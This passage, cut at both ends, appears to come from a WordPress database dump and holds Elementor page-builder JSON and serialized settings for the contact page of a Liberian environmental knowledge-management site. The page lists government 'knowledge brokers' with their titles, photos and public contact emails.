Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Assistant Manager - Compliance and Enforcement, ESIA, EPA\\nkawumtoure@gmail.com\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(21788,3154,'_elementor_controls_usage','a:7:{s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:38;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:35;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:7:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:21:\"background_attachment\";i:1;s:17:\"background_repeat\";i:1;s:15:\"background_size\";i:1;s:28:\"background_slideshow_gallery\";i:1;s:25:\"background_slideshow_loop\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:15;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:15;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:12;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:15;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:15;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:4:{s:10:\"text_color\";i:15;s:21:\"typography_typography\";i:14;s:20:\"typography_font_size\";i:14;s:5:\"align\";i:15;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:8:\"_padding\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:7:{s:5:\"image\";i:5;s:10:\"image_size\";i:5;s:22:\"image_custom_dimension\";i:5;s:14:\"caption_source\";i:5;s:7:\"caption\";i:5;s:7:\"link_to\";i:5;s:4:\"link\";i:5;}}s:5:\"style\";a:1:{s:21:\"section_style_caption\";a:2:{s:10:\"text_color\";i:5;s:29:\"caption_typography_typography\";i:1;}}}}}'),(21797,3156,'_elementor_edit_mode','builder'),(21798,3156,'_elementor_template_type','wp-page'),(21799,3156,'_elementor_version','2.7.5'),(21800,3156,'_wp_page_template','default'),(21801,3156,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":90,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. 